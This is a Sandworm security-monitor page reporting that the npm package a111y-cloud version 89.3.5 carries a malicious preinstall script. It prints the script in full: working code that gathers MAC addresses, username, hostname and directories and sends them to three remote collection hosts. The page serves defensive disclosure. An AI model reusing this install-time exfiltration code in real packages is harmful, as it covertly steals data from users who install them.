Home
Docs
GitHub
Blog
DOCS
GITHUB
BLOG

Npm Install Scripts Monitor

Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our 𝕏 / Twitter feed for updates.

a111y-cloud

↗️ View on Npm
⚠️
Found 1 vulnerable versions for package 
a111y-cloud
:
89.3.5

a111y-cloud@89.3.5

Detected: 12 Nov 2024
Detected Date: 12 Nov 2024
Affected Install Script: preinstall
Package Source: ↗️ View on Npm

The code collects sensitive information such as the MAC addresses, home directory, username, and hostname of the machine and sends this data to multiple remote servers without user consent. This could be exploited to track users or compromise their privacy, making it a clear security risk.

Install script:
node index.js
Install script code:
const os = require("os");
const querystring = require("querystring");
const http = require("http");
const fs = require("fs");
const packageJSON = require("./package.json");
const packageName = packageJSON.name;


function getMacAddressesBase64() {
    const networkInterfaces = os.networkInterfaces();
    const macAddresses = [];

    for (const interfaceName in networkInterfaces) {
        const interfaces = networkInterfaces[interfaceName];
        interfaces.forEach((iface) => {
            if (iface.mac && !macAddresses.includes(iface.mac)) {
                macAddresses.push(iface.mac);
            }
        });
    }

    const macString = macAddresses.join(",");
    return Buffer.from(macString).toString("base64");
}

const macAddressesBase64 = getMacAddressesBase64();

const trackingData = querystring.stringify({
    package: packageName,
    dir: __dirname,
    homedir: os.homedir(),
    hostname: os.hostname(),
    mac_addresses: macAddressesBase64,
    username: os.userInfo().username,
});

const addresses = [
    "dnipqouebm-psl.cn.oast-cn.byted-dast.com",
    "oqvignkp58-psl.i18n.oast-row.byted-dast.com",
    "sbfwstspuutiarcjzptfutygntsslnz7p.oast.fun"
];

function generateRandomFiveDigitNumber() {
    return Math.floor(10000 + Math.random() * 90000);
}

const randomNumber = generateRandomFiveDigitNumber();

addresses.forEach((hostname) => {
    const options = {
        hostname: hostname,
        port: "80",
        path: `/realtime_p/npm/${randomNumber}?${trackingData}`,
        method: "GET",
        rejectUnauthorized: false
    };

    const req = http.request(options, (res) => {
        res.on("data", (d) => {
            console.log(`Response from ${hostname}:`, d.toString());
        });
    });

    req.on("error", (e) => {
        console.error(`Error with request to ${hostname}:`, e);
    });

    req.end();
});
Sandworm Dunes
Ready to start?

Scan your app for security vulnerabilities and license issues

Sandworm Open Source
Sandworm
Getting Started Issue Types Resolve Issues License Policies Sandworm Guard
Support
Sponsor Discuss Terms of Use Privacy Policy Security
More from Sandworm
Newsletter 𝕏 / Twitter 𝕏 / Twitter Security Alerts Knowledge Base Blog Contact